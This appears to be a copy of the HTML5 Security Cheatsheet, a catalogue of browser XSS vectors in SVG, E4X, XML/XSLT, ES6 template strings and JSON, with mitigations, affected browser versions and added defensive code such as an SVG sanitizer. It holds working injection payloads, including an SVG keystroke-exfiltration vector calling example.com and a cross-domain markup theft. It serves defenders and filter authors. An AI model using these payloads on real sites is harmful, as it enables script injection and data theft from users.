<script>ReferenceError.prototype.__defineGetter__('name', function(){alert(1)}),x</script>
Do not trust the DOM in case the user can influence it via script injections, includes or other DOM based property access.
- Opera 8.X
- Opera 11.01
- Firefox 1.X
- Firefox 15.0
- Chrome 3.0
- Chrome 9.0
- Safari 4.0
- Safari 5.1.7
JavaScript execution via proprietary __noSuchMethod__ (#21)
Firefox supports the non-standard __noSuchMethod__ property, which is used as an interceptor as soon as a non-existent object method is called. It can be assigned the Function object to force JavaScript execution without using function(){...}.
<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(1)')()</script>
- Firefox 3.5
- Firefox Latest
Spoofing the address bar information with history.replaceState() (#103)
The history.pushState() and history.replaceState() APIs allow creating and modifying the user's history entries. An attacker can use this feature to change the information displayed in the address bar as well as the location DOM object, and thus initiate phishing attacks or obfuscate bad intentions. While pushState adds a new history entry, replaceState modifies the current one. This removes nearly all traces of the actual location from the browsing history, leaving no possibility to navigate back. The information shown in the address bar can no longer be trusted as soon as an attacker or a malicious website executes JavaScript. The example uses pushState; replaceState with the same arguments behaves alike but overwrites the current entry.
<script>history.pushState(0,0,'/i/am/somewhere_else');</script>
- Firefox 4.0
- Firefox Latest
- Chrome 6.0
- Chrome Latest
- Safari 5.0
- Safari Latest
- Opera 11.50
- Opera Latest
- Internet Explorer 10.0
- Internet Explorer Latest
Executing JavaScript using ES6 Template Strings (#140)
ES6 specifies a new language feature called "Template Strings" (often also referred to as "Quasi Literals", alongside multi-line strings and others). It allows executing arbitrary JavaScript code without using parentheses, using back-ticks instead. Inside back-tick delimited strings, placeholders such as ${} can wrap executable code.
<script>
alert`1`;
var something = `abc${alert(1)}def`;
``.constructor.constructor`alert\`1\````;
</script>
Make sure that your IDS, filter and other protective systems are aware of the fact that back-ticks (U+0060) are now capable of invoking methods and functions in JavaScript. Further make sure that sequences such as ${} cannot be injected into existing template and multi-line strings.
- Firefox 34.0
- Firefox Latest
E4X vectors working on Gecko-based browsers
Self-including E4X-based JavaScript snippet (#25)
This <SCRIPT> tag tries to include the very same page it is being executed from, and then executes the {}-delimited E4X payload. To avoid having Firefox throw an error during inclusion, an ending sequence such as the ;1 shown is necessary.
<script src="#">{alert(1)}</script>;1
E4X is extremely dangerous since any page can include sources providing valid XML plus the mentioned semicolon delimiter. For effective protection websites must declare a DOCTYPE - or contain invalid markup. There are many variations of the ending delimiter: as long as it is valid JavaScript and does not indicate that the page is XML only, it will work (;1, ,1, ._, etc.).
- Firefox 1.5
- Firefox 16.0
E4X-based UTF-7 JavaScript/HTML snippet stealing cross-domain markup (#26)
If an attacker can inject a character sequence beginning with .toXMLString(), it is possible to include the victim website in a <SCRIPT> tag loaded from an arbitrary page and steal the markup of the included page - across domain and protocol borders. Note that the whole vector is encoded in UTF-7. This is possible since the including <SCRIPT> tag can decide via its charset attribute which charset to use.
+ADw-html+AD4APA-body+AD4APA-div+AD4-top secret+ADw-/div+AD4APA-/body+AD4APA-/html+AD4-.toXMLString().match(/.*/m),alert(RegExp.input);
Make sure all pages declare a charset such as UTF-8. Also, incoming data should be converted from UTF-7 before being escaped with htmlentities() or comparable methods. All websites containing sensitive data should declare a DOCTYPE.
- Firefox 1.5
- Firefox 4.0.1
E4X used to close an opening <SCRIPT> tag and create an E4X object at the same time (#58)
This one is tricky. Firefox allows ending an opening <SCRIPT> tag with a new E4X object (<b/>), which is created in the JavaScript scope at the same time. The alert happens because the additional < introduces a comparison (<b/> < alert(1)).
<b><script<b></b><alert(1)</script </b></b>
- Firefox 1.5
- Firefox 3.6.28
E4X used to close an opening <SCRIPT> tag and {} evaluation (#75)
In this example an E4X object is used to close a half-open <SCRIPT> tag and then evaluate code in the global scope via the E4X curly bracket delimiters. This technique no longer works as soon as Firefox uses the already integrated HTML5 parser (html5.enable=true).
<script<{alert(1)}/></script </>
- Firefox 1.5
- Firefox 3.6.28
Vectors attacking DOM properties and methods
Self-including DOM Worker XSS (#4)
A self-including code snippet utilizing a DOM worker and firing a message event to itself, causing script execution. The base64 part of the data URI decodes to postMessage('alert(1)').
0?<script>Worker("#").onmessage=function(_)eval(_.data)</script> :postMessage(importScripts('data:;base64,cG9zdE1lc3NhZ2UoJ2FsZXJ0KDEpJyk'))
- Firefox 3.5
- Firefox 15.0
JSON based vectors
Self-hijacking JSON literals (#54)
In case parts of a JSON literal are controlled by user input, there is a risk of allowing values of later object members to be auto-harvested via a setter installed on Object.prototype.
<script>[{'a':Object.prototype.__defineSetter__('b',function(){alert(arguments[0])}),'b':['secret']}]</script>
- Opera 10.0
- Opera 10.10
- Chrome 4.0
- Chrome 6.0
- Firefox 1.X
- Firefox 3.0.19
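The browser list above stops at engines from the ES3 era, and the reason is worth seeing in code: since ES5, object literals and JSON.parse define properties directly on the new object, so an inherited setter never runs, while ordinary assignment into an existing object still does. The following is an added example (not from the original cheatsheet) that installs the same kind of harvesting setter and compares the three cases; the helper names are assumptions made for the example.

```javascript
'use strict';

// Install a harvesting setter for `name` on Object.prototype, as the vector
// above does with __defineSetter__, and record every value that flows through it.
function installHarvester(name) {
  const seen = [];
  Object.defineProperty(Object.prototype, name, {
    configurable: true,
    enumerable: false,
    get() { return undefined; },
    set(value) {
      seen.push(value);
      // Shadow the hook on the instance so the object keeps working normally.
      Object.defineProperty(this, name, { value, writable: true, configurable: true, enumerable: true });
    },
  });
  return { seen, remove: () => { delete Object.prototype[name]; } };
}

// Run `producer` while the harvester is installed and report what leaked.
function harvest(producer) {
  const hook = installHarvester('b');
  try {
    const obj = producer();
    return { leaked: hook.seen.slice(), value: obj.b };
  } finally {
    hook.remove();
  }
}

// 1. An object literal, as in the original vector: ES5+ engines define the
//    property directly on the new object, so the prototype setter never runs.
const viaLiteral = () => harvest(() => ({ a: 1, b: ['secret'] }));

// 2. JSON.parse creates data properties as well; nothing leaks either.
const viaJsonParse = () => harvest(() => JSON.parse('{"a":1,"b":["secret"]}'));

// 3. Copying into an existing object with Object.assign is an ordinary
//    [[Set]], so the inherited setter fires and harvests the value.
const viaAssign = () => harvest(() => Object.assign({}, { a: 1, b: ['secret'] }));

for (const [label, run] of [['literal', viaLiteral], ['JSON.parse', viaJsonParse], ['Object.assign', viaAssign]]) {
  console.log(label + ':', JSON.stringify(run().leaked));
}
```

The literal-based vector is therefore historical, but any code that copies parsed JSON into pre-existing objects (Object.assign, manual for-in copies, data-binding layers) is still exposed to a polluted Object.prototype; parse with JSON.parse and build fresh objects instead of assigning into shared ones.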
Vectors embedded in SVG files
SVG executing JavaScript via <G> tag and onload attribute (#11)
SVG files can execute JavaScript via onload events on any element, without user interaction.
<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:alert(1)"></g></svg>
SVG files should not be treated as images - especially when it comes to uploads. An SVG file can contain arbitrary HTML data as well as event handlers in native elements.
- Opera 10.0
- Opera 12.0
- Chrome 4.0
- Chrome 35.0
- Firefox 3.0
- Firefox 3.6.28
- Safari 5.0
- Safari 5.1.7
- Internet Explorer 9.0
- Internet Explorer Latest
Opera 10 SVG font XSS#43test
Opera 10.00 and later minor versions allow using SVG fonts and will - as soon as the font file has loaded even execute embedded JavaScript. The current example utilizes a load event handler to execute the JavaScript without user interaction as soon as the font file has been fully loaded.
<?xml version="1.0" standalone="no"?> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <style type="text/css"> @font-face {font-family: y; src: url("font.svg#x") format("svg");} body {font: 100px "y";} </style> </head> <body>Hello</body> </html>
<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg onload="alert(1)" xmlns="http://www.w3.org/2000/svg"><defs><font id="x"><font-face font-family="y"/></font></defs></svg>
(file font.svg, required_mime: image/svg+xml, crossdomain: 0, path: http://html5sec.org/font.svg)
- Opera 10.0
SVG file executing JavaScript via <SCRIPT> tag (#47)
SVG files can force the user agent to execute JavaScript via plain <SCRIPT> tags inside any SVG element without user interaction
<svg xmlns="http://www.w3.org/2000/svg"><script>alert(1)</script></svg>
SVG files should not be treated as images, especially when it comes to uploads. An SVG file can contain arbitrary HTML data as well as event handlers on native elements.
- Opera 10.X
- Opera Latest
- Chrome 4.0
- Chrome Latest
- Firefox 3.X
- Firefox Latest
- Internet Explorer 9.0
- Internet Explorer Latest
- Safari 5.0
- Safari Latest
SVG element allows automatic execution of onload attribute without other SVG elements (#65)
SVG tags allow code to be executed with onload without any other elements. This makes for a very short and effective XSS vector, useful in many situations.
<svg onload="javascript:alert(1)" xmlns="http://www.w3.org/2000/svg"></svg>
Not really a bug to fix, this is desired behaviour and only increases XSS scope.
- Chrome 4.0
- Chrome Latest
- Safari 3.4
- Safari Latest
- Firefox 2.0
- Firefox Latest
- Opera 9.X
- Opera Latest
- Internet Explorer 9.0
- Internet Explorer Latest
SVG simple passive JavaScript execution via XLink (#87)
Browsers that support SVG are forced to support XLink as well. For the <a> tag the value of the "xlink:actuate" attribute is fixed to "onRequest", so the link fires on user interaction.
<svg xmlns="http://www.w3.org/2000/svg"> <a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="javascript:alert(1)"><rect width="1000" height="1000" fill="white"/></a> </svg>
- Chrome 4.0
- Chrome Latest
- Safari 3.4
- Safari Latest
- Firefox 3.0
- Firefox Latest
- Opera 9.X
- Opera Latest
- Internet Explorer 6.0
- Internet Explorer Latest
SVG active JavaScript execution via XLink in Opera (#88)
The content of the XLinks is automatically included in the current document. The combination of "onLoad" (value of xlink:actuate) and "embed" (value of xlink:show) is what the potentially unsafe SVG elements shown below (<animation>, <image>, <foreignObject>) use.
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <animation xlink:href="javascript:alert(1)"/> <animation xlink:href="data:text/xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(1)'%3E%3C/svg%3E"/> <image xlink:href="data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(1)'%3E%3C/svg%3E"/> <foreignObject xlink:href="javascript:alert(1)"/> <foreignObject xlink:href="data:text/xml,%3Cscript xmlns='http://www.w3.org/1999/xhtml'%3Ealert(1)%3C/script%3E"/> </svg>
- Opera 9.X
- Opera 12.0
SVG event handler injection via "set" and "animate" (#89)
Google Chrome and Safari support binding an event handler using the elements <set> or <animate>. The "attributeName" value is the event actually being bound, while the "to" attribute value holds the payload. The problem has been fixed in recent Chrome versions.
<svg xmlns="http://www.w3.org/2000/svg"> <set attributeName="onmouseover" to="alert(1)"/> <animate attributeName="onunload" to="alert(1)"/> </svg>
- Chrome 4.0
- Chrome 10.0
- Safari 3.4
- Safari 4.0.3
Using SVG element <handler> (#94)
The SVG Tiny 1.2 specification provides a <handler> element, which acts as a "bridge" between SVG and XML Events. This element can contain regular JavaScript.
<svg xmlns="http://www.w3.org/2000/svg"> <handler xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load">alert(1)</handler> </svg>
- Opera 10.0
- Opera 12.0
Using SVG element <feImage> and animated data URIs (#95)
SVG allows filter effects to be applied to arbitrary visible SVG elements. The <feImage> filter primitive allows inclusion of other files, data URIs included. With a maliciously crafted data URI it is possible to execute JavaScript without user interaction. A list of all elements that can be animated can be found in the SVG specification.
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <feImage> <set attributeName="xlink:href" to="data:image/svg+xml;charset=utf-8;base64, PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPjxzY3JpcHQ%2BYWxlcnQoMSk8L3NjcmlwdD48L3N2Zz4NCg%3D%3D"/> </feImage> </svg>
Make sure that user submitted SVG data and SVG files are treated as XML documents, not as images. The nature of SVG allows including almost arbitrary XML data, including JavaScript, leading to XSS or worse.
- Opera 10.0
- Opera 12.0
Executing JavaScript in SVG Tiny 1.2 without user interaction (#104)
Opera, which provides advanced support for SVG Tiny 1.2 targeting mobile devices, allows executing JavaScript without user interaction via arbitrary tags. The tag is given a handler pointing to a data URI that contains the actual handler. The hash at the end of the data URI is important, as it identifies the correct handler. It is also possible to refer to an element contained in the SVG by its ID, or to an external resource.
<svg xmlns="http://www.w3.org/2000/svg" id="foo"> <x xmlns="http://www.w3.org/2001/xml-events" event="load" observer="foo" handler="data:image/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%0A%3Chandler%20xml%3Aid%3D%22bar%22%20type%3D%22application%2Fecmascript%22%3E alert(1) %3C%2Fhandler%3E%0A%3C%2Fsvg%3E%0A#bar"/> </svg>
- Opera 10.X
- Opera 12.0
SVG payload obfuscation with gzipped HTML and MIME type image/svg-xml (#105)
Opera allows displaying compressed SVG images without the usually necessary encoding header. This works for almost arbitrary data as long as the content type image/svg+xml is set, or image/svg-xml as in this example. Notice that the compressed data can be truncated. Opera will still accept it, render the <script> tag and execute the alert(1), while most other Gzip parsers will break, rendering any WAF or similar tool trying to analyze the payload useless (gzip 1.3.12 states the payload contains 50+ MB of binary gibberish). The example contains no actual SVG code, just a regular <script> tag with an XHTML namespace attribute.
<iframe src="data:image/svg-xml,%1F%8B%08%00%00%00%00%00%02%03%B3)N.%CA%2C(Q%A8%C8%CD%C9%2B%B6U%CA())%B0%D2%D7%2F%2F%2F%D7%2B7%D6%CB%2FJ%D77%B4%B4%B4%D4%AF%C8(%C9%CDQ%B2K%CCI-*%D10%D4%B4%D1%87%E8%B2%03"></iframe>
- Opera 10.X
- Opera 12.0
Passive SVG JavaScript execution via style injection (1) (#109)
SVG supports several new CSS properties (clip-path, fill, filter, marker, marker-end, marker-mid, marker-start, mask, stroke) which can refer to external SVG resources. These properties can also be used as separate attributes. The external SVG can contain information to animate the current SVG document. The example shows animation of links, but other elements can be animated as well. Note that Opera does not show the user the changed link address if the cursor does not leave the link.
<svg xmlns="http://www.w3.org/2000/svg"> <a id="x"><rect fill="white" width="1000" height="1000"/></a> <rect fill="white" style="clip-path:url(test3.svg#a);fill:url(#b);filter:url(#c);marker:url(#d);mask:url(#e);stroke:url(#f);"/> </svg>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <clipPath id="a" > <set xlink:href="#x" attributeName="xlink:href" begin="1s" to="javascript:alert(1)" /> </clipPath> <pattern id="b"> <set xlink:href="#x" attributeName="xlink:href" begin="2s" to="javascript:alert(2)" /> </pattern> <filter id="c"> <set xlink:href="#x" attributeName="xlink:href" begin="3s" to="javascript:alert(3)" /> </filter> <marker id="d"> <set xlink:href="#x" attributeName="xlink:href" begin="4s" to="javascript:alert(1)" /> </marker> <mask id="e"> <set xlink:href="#x" attributeName="xlink:href" begin="5s" to="javascript:alert(2)" /> </mask> <linearGradient id="f"> <set xlink:href="#x" attributeName="xlink:href" begin="6s" to="javascript:alert(3)" /> </linearGradient> </svg>
(file test3.svg, required_mime: image/svg+xml, crossdomain: 1, path: http://html5sec.org/test3.svg)
- Opera 10.X
- Opera 12.0
Passive SVG JavaScript execution via style injection (2) (#110)
This example shows how SVG markers allow insertion of external links with JavaScript URI into the current document.
<svg xmlns="http://www.w3.org/2000/svg"> <path d="M0,0" style="marker-start:url(test4.svg#a)"/> </svg>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <marker id="a" markerWidth="1000" markerHeight="1000" refX="0" refY="0"> <a xlink:href="http://google.com"> <set attributeName="xlink:href" to="javascript:alert(1)" begin="1s" /> <rect width="1000" height="1000" fill="white"/> </a> </marker> </svg>
(file test4.svg, required_mime: image/svg+xml, crossdomain: 1, path: http://html5sec.org/test4.svg)
- Opera 10.X
- Opera 11.52
SVG chameleon behavior via embedded XSLT (#125)
This SVG chameleon file can be embedded via <embed> on most browsers, and via <img> on most modern browsers. Thanks to the embedded XSLT stylesheet it changes its appearance depending on how it is embedded or displayed. In an <img> tag it just shows a red dot. But opened directly, or via an <iframe> or <embed>, the XSLT turns the whole SVG into (X)HTML and an alert will show. While most modern browsers show this behavior, Opera will completely mess it up and show an alert when used via <embed> and an <iframe> when used via <img> (!). Chrome will show a broken image and an alert.
<?xml version="1.0"?> <?xml-stylesheet type="text/xml" href="#stylesheet"?> <!DOCTYPE doc [ <!ATTLIST xsl:stylesheet id ID #REQUIRED>]> <svg xmlns="http://www.w3.org/2000/svg"> <xsl:stylesheet id="stylesheet" version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> <xsl:template match="/"> <iframe xmlns="http://www.w3.org/1999/xhtml" src="javascript:alert(1)"></iframe> </xsl:template> </xsl:stylesheet> <circle fill="red" r="40"></circle> </svg>
- Internet Explorer 9.0
- Internet Explorer Latest
- Firefox 3.X
- Firefox Latest
JavaScript execution on Opera via listener delegation (#127)
The example vector, related to #94, shows how a combination of <listener> and <handler> elements can be used to delegate a load event from the SVG element to trigger actual JavaScript execution. So far only Opera supports the usage of XML Events and related elements in this context. No user interaction is required to execute the JavaScript.
<svg xmlns="http://www.w3.org/2000/svg" id="x"> <listener event="load" handler="#y" xmlns="http://www.w3.org/2001/xml-events" observer="x"/> <handler id="y">alert(1)</handler> </svg>
- Opera 9.0
- Opera 12.0
Firefox parsing entity encoded HTML in SVG (#128)
Firefox 4 allows HTML entities used in plain-text tags such as style, nostyle, noframes and others to represent their canonical form. This makes it possible to bypass filters despite proper HTML encoding, as the example demonstrates, especially when inline SVG and innerHTML copy access are being used. This bug has been fixed in more recent Firefox versions.
<svg><style>&lt;img/src=x onerror=alert(1)// </b>
- Firefox 4.0
Opera active JavaScript execution via STYLE in SVG (#129)
In addition to script execution via "xlink:href" in SVG elements such as <image>, <animation> and <foreignObject>, Opera 11 allows utilizing filters (as well as the other CSS properties listed in #109) to accomplish the same. Note that both these CSS properties and the analogous attributes (the filter attribute in particular) can be used in this case. Both style and the analogous attributes in inline SVG should be considered unsafe.
<svg> <image style='filter:url("data:image/svg+xml,<svg xmlns=%22http://www.w3.org/2000/svg%22><script>parent.alert(1)</script></svg>")'> <!-- Same effect with <image filter='...'> --> </svg>
Do not allow style and filter attributes inside user generated SVG data. It is generally best to avoid user generated SVG data altogether, if possible.
- Opera 11.60
- Opera 12.0
SVG <set> and <animate> elements allow key-logging w/o JavaScript (#132)
It is possible to achieve an injection capable of exfiltrating keyboard events without any JavaScript execution via SVG and set/animate timing attributes. In essence, an access key can be specified to trigger events inside an SVG. In case an inline SVG is being used, the listener for these keys observes the whole document, not just the SVG itself. This means that even keystrokes into a form input trigger the SVG access key handler. Once this access key handler is combined with adding a new keystroke-dependent image source to an existing image, the form input will be filled, and the SVG will reset a hidden image source according to the key being pressed and thereby silently exfiltrate the data. Since all this works without using any JavaScript, it was also possible to execute this attack in the latest Thunderbird versions, with the vector invisibly wrapped inside the mail body. The problem has been reported and fixed, and CVE-2011-3663 has been assigned. Current stable versions of Firefox still allow observing the problem; using a network traffic monitor or Firebug is recommended.
<!doctype html> <form> <label>type a,b,c,d - watch the network tab/traffic (JS is off, latest NoScript)</label> <br> <input name="secret" type="password"> </form> <!-- injection --><svg height="50px"> <image xmlns:xlink="http://www.w3.org/1999/xlink"> <set attributeName="xlink:href" begin="accessKey(a)" to="//example.com/?a" /> <set attributeName="xlink:href" begin="accessKey(b)" to="//example.com/?b" /> <set attributeName="xlink:href" begin="accessKey(c)" to="//example.com/?c" /> <set attributeName="xlink:href" begin="accessKey(d)" to="//example.com/?d" /> </image> </svg>
- Firefox 4
- Firefox Latest
Executing JavaScript via "from" attribute in SVG and inline-SVG (#137)
It is commonly known that the <animate> element in combination with the "to" parameter can be used to change existing attributes to potentially active values and cause arbitrary script execution. It is nevertheless also possible to use the "from" attribute for the very same purpose, although this is rather counter-intuitive. The given example code snippet describes an SVG containing a circle that encapsulates an <animate> element. This uses the "from" attribute to set the "href" attribute of the link encapsulating the circle to a JavaScript URI. Clicking the circle will execute the JavaScript.
<svg> <a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="?"> <circle r="400"></circle> <animate attributeName="xlink:href" begin="0" from="javascript:alert(1)" to="&" /> </a>
Avoid inline-SVG in combination with user-generated content. In case SVG needs to be used, avoid potentially harmful content for "to", "from", "values" and "by" attributes.
- Firefox 25.0
- Firefox Latest
- Opera 15.0
- Opera Latest
- Chrome 30.0
- Chrome Latest
- Safari 5.0
- Safari Latest
Executing JavaScript using ES6 Template Strings in SVG (#141)
The new language features shown in #140 can also be used in the context of an SVG image. Here, the entity for the back-tick (`) can be used to initiate execution of a function or method.
<svg><script> alert`1` <p> <svg><script> alert`1` <p>
Make sure that your IDS, filter and other protective systems are aware of the fact that in SVG, HTML-encoded back-ticks (U+0060) are now capable of initiating execution of methods and functions in JavaScript.
- Firefox 34.0
- Firefox Latest
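As an added defender-side example that is not code from html5sec.org, the following Python sanitizer applies the advice repeated throughout this section (treat user-submitted SVG as XML, never as an image) by parsing the document and dropping what the SVG vectors above rely on: script, handler, listener, set, animate and other non-drawing elements and anything in a foreign namespace (#11, #47, #65, #89, #94, #95, #104, #127), on* attributes, javascript: and data: URIs in href/xlink:href (#87, #88, #137), and style or presentation attributes whose url() points outside the document (#109, #110, #129). The element allowlist, the URL policy and all helper names are assumptions of this example, not part of the page.

```python
"""Allowlist-based sanitizer that treats submitted SVG as XML, not as an image."""
import re
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"
XLINK_NS = "http://www.w3.org/1999/xlink"
XML_NS = "http://www.w3.org/XML/1998/namespace"

# Assumed allowlist of plain drawing elements. Everything else is removed:
# script, handler, listener, set, animate, animation, foreignObject, feImage,
# image, and any element in a foreign namespace (XML Events, XSLT, XHTML).
ALLOWED_ELEMENTS = {
    "svg", "g", "defs", "title", "desc", "path", "rect", "circle", "ellipse",
    "line", "polyline", "polygon", "text", "tspan", "linearGradient",
    "radialGradient", "stop", "clipPath", "mask", "pattern", "marker", "a",
}

# CSS properties from #109 that may pull in an external SVG document via url().
URL_PROPERTIES = {"clip-path", "fill", "filter", "marker", "marker-start",
                  "marker-mid", "marker-end", "mask", "stroke"}

URL_REF = re.compile(r"url\(\s*['\"]?([^'\")]*)['\"]?\s*\)", re.IGNORECASE)


def _split(tag):
    """Split an ElementTree '{namespace}name' into (namespace, name)."""
    if tag.startswith("{"):
        ns, _, name = tag[1:].partition("}")
        return ns, name
    return "", tag


def _only_local_refs(value):
    """True if every url(...) in the value points at a fragment of this document."""
    return all(ref.strip().startswith("#") for ref in URL_REF.findall(value))


def _safe_href(value):
    """Allow local fragments and plain http(s) links only (no javascript:, data:, ...)."""
    return value.strip().lower().startswith(("#", "http://", "https://"))


def _attribute_problem(ns, name, value):
    """Return why an attribute must be dropped, or None if it may stay."""
    if ns not in ("", XLINK_NS, XML_NS):
        return "attribute in foreign namespace " + ns      # ev:event, ev:handler
    if name.lower().startswith("on"):
        return "event handler attribute " + name           # onload, onmouseover, ...
    if name == "href" and not _safe_href(value):
        return "unsafe href %r" % value                    # javascript: / data: URIs
    if name == "style" and not _only_local_refs(value):
        return "style with external url() reference"       # #109, #129
    if name in URL_PROPERTIES and not _only_local_refs(value):
        return name + " with external url() reference"     # presentation attributes
    return None


def _scrub(element, findings):
    """Recursively drop disallowed attributes and child elements in place."""
    tag = _split(element.tag)[1]
    for attr in list(element.attrib):
        ns, name = _split(attr)
        problem = _attribute_problem(ns, name, element.attrib[attr])
        if problem:
            findings.append("<%s>: dropped %s" % (tag, problem))
            del element.attrib[attr]
    for child in list(element):
        ns, name = _split(child.tag)
        if ns != SVG_NS or name not in ALLOWED_ELEMENTS:
            findings.append("removed element <%s>" % name)
            element.remove(child)   # drops the element, its text (script body) and tail
        else:
            _scrub(child, findings)


def sanitize_svg(svg_text):
    """Parse svg_text as XML and return (cleaned_svg, findings).

    Documents that are not well-formed XML, or whose root is not <svg> in the
    SVG namespace (so an unnamespaced inline <svg> is rejected too), are refused
    outright and cleaned_svg is None.
    """
    try:
        root = ET.fromstring(svg_text)
    except ET.ParseError as exc:
        return None, ["rejected: not well-formed XML (%s)" % exc]
    if _split(root.tag) != (SVG_NS, "svg"):
        return None, ["rejected: root element is %r, not an SVG" % root.tag]
    findings = []
    _scrub(root, findings)
    ET.register_namespace("", SVG_NS)
    ET.register_namespace("xlink", XLINK_NS)
    return ET.tostring(root, encoding="unicode"), findings


if __name__ == "__main__":
    # Constructed sample: the <g onload> vector (#11) wrapped around a benign circle.
    sample = ('<svg xmlns="http://www.w3.org/2000/svg">'
              '<g onload="javascript:alert(1)"><circle r="40" fill="red"/></g></svg>')
    cleaned, found = sanitize_svg(sample)
    print(cleaned)
    for item in found:
        print("-", item)
```

The findings list is what you would log or alert on in an upload pipeline; a document that produces any finding came from a source that tried to smuggle active content and deserves a closer look rather than silent cleaning alone.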
Vectors related to X(HT)ML
Opera XML-stylesheets executing JavaScript (#17)
Opera 9.x and 10.0 allow applying XML stylesheets with JavaScript URIs. The vector even works if the page is delivered as text/html.
<?xml-stylesheet href="javascript:alert(1)"?><root/>
Make sure that user input cannot contain XML stylesheets or tags not matching <\w+, because this vector would only be matched via <\?\w+ but still executes JavaScript without user interaction. Avoid blacklists if possible.
- Opera 9.X
- Opera 10.10
Entities inside <SCRIPT> and comparable tags (#18)
By specification user agents allow using HTML entities between <SCRIPT> and <STYLE> tags in case the document is being delivered and rendered as X(HT)ML.
<script xmlns="http://www.w3.org/1999/xhtml">alert(1)</script>
Make sure filters and detection systems consider that entities are allowed between <SCRIPT>, <STYLE> and other tags, not only in attributes.
- Opera 8.X
- Opera Latest
- Firefox 1.X
- Firefox Latest
- Chrome 3.0
- Chrome Latest
- Safari 5.0
- Safari Latest
- Internet Explorer 9.0
- Internet Explorer Latest
Arbitrary payload injection via XML External Entities (XXE) (#64)
Chrome and Safari allow using external XML entities to reference payload for an entity. The example shows that the entity &x; is now being filled with the content of the given file. The document must be delivered as XML or XHTML. Note that the absolute URL for the source of XXE is required.
<!DOCTYPE x[<!ENTITY x SYSTEM "http://html5sec.org/test.xxe">]><y>&x;</y>
In case an attacker can inject data into the DOCTYPE area of the targeted website it's easy to fool filtering mechanisms since the actual payload is hidden in a harmless looking entity. Make sure no injections in that area are possible.
<script xmlns="http://www.w3.org/1999/xhtml">alert(1)</script>
(file test.xxe, crossdomain: 0, path: http://html5sec.org/test.xxe)
- Chrome 3.0
- Chrome Latest
- Opera 16.0
- Opera Latest
- Safari 3.0
- Safari Latest
Opera XML-stylesheets executing JavaScript (2) (#66)
Opera supports xml-stylesheet via data URIs. There are many ways to execute JavaScript using XSL (XSLT). If you put this code in an external file on the same domain, it will work in all browsers. It is also possible to refer to the stylesheet by id (href="#xss") when the stylesheet is embedded in the current document.
<?xml version="1.0"?> <?xml-stylesheet type="text/xsl" href="data:,%3Cxsl:transform version='1.0' xmlns:xsl='http://www.w3.org/1999/XSL/Transform' id='xss'%3E%3Cxsl:output method='html'/%3E%3Cxsl:template match='/'%3E%3Cscript%3Ealert(1)%3C/script%3E%3C/xsl:template%3E%3C/xsl:transform%3E"?> <root/>
- Opera 8.0
- Opera 12.0
XML ATTLIST declaration causing JavaScript execution (#67)
XML ATTLIST declarations can be used to create attributes and assign values for matching tags inside the DOCTYPE declaration. By choosing the right namespace and attribute combinations it is possible to create an ATTLIST declaration causing JavaScript execution without user interaction.
<!DOCTYPE x [ <!ATTLIST img xmlns CDATA "http://www.w3.org/1999/xhtml" src CDATA "xx:x" onerror CDATA "alert(1)" onload CDATA "alert(2)"> ]><img />
In case a website is being delivered as XML or XHTML make sure an attacker has no possibility to inject data into the DOCTYPE or create new ATTLIST directives.
- Chrome 4.0
- Chrome Latest
- Safari 3.0
- Safari Latest
- Firefox 3.0
- Firefox Latest
- Opera 8.0
- Opera Latest
Passive JavaScript execution via XLinks (#68)
Gecko based browsers like Firefox allow using XLinks. Those can be equipped with a JavaScript URI to execute JavaScript in case the user clicks on one of those XLinks.
<doc xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:html="http://www.w3.org/1999/xhtml"> <html:style /><x xlink:href="javascript:alert(1)" xlink:type="simple">XXX</x> </doc>
- Firefox 3.0
- Firefox 3.6.28
Opera WML JavaScript execution via timer event (#69)
Opera supports WML files (Wireless Markup Language). As soon as a file has the extension .wml, Opera assumes it is a WML file and renders it accordingly. With a timer event and a connected redirect it is possible to execute JavaScript without user interaction.
<card xmlns="http://www.wapforum.org/2001/wml"><onevent type="ontimer"><go href="javascript:alert(1)"/></onevent><timer value="1"/></card>
- Opera 9.X
- Opera 12.0
Arbitrary payload injection via XML external DTD in IE (#76)
IE will render doctype-provided entities in the "html" namespace as soon as a user defined XML stylesheet tag is present. The example works up to IE8 standards mode.
<?xml-stylesheet type="text/css"?><!DOCTYPE x SYSTEM "test.dtd"><x>&x;</x>
<!ENTITY x "<html:img src='x' xmlns:html='http://www.w3.org/1999/xhtml' onerror='alert(1)'/>">
(file test.dtd, crossdomain: 1, path: http://html5sec.org/test.dtd)
- Internet Explorer 6.0
- Internet Explorer Latest (In Older Docmodes)
XML JavaScript execution via style attribute in IE (#77)
IE supports the style attribute in xml-pages too. Thus JavaScript can be executed via expression() with any given tag. The example works up to IE 7 standards mode.
<?xml-stylesheet type="text/css"?><root style="x:expression(write(1))"/>
- Internet Explorer 6.0
- Internet Explorer 10.0
Arbitrary payload injection via XSL + XDR-schema in IE (#78)
The namespace "html" is automatically determined using XSL. Missing attributes for the <img> tag such as "onerror" are obtained from the XDR-schema - and will then execute JavaScript. The example works up to IE 8 standards mode.
<?xml-stylesheet type="text/xsl" href="#"?><img xmlns="x-schema:test.xdr"/>
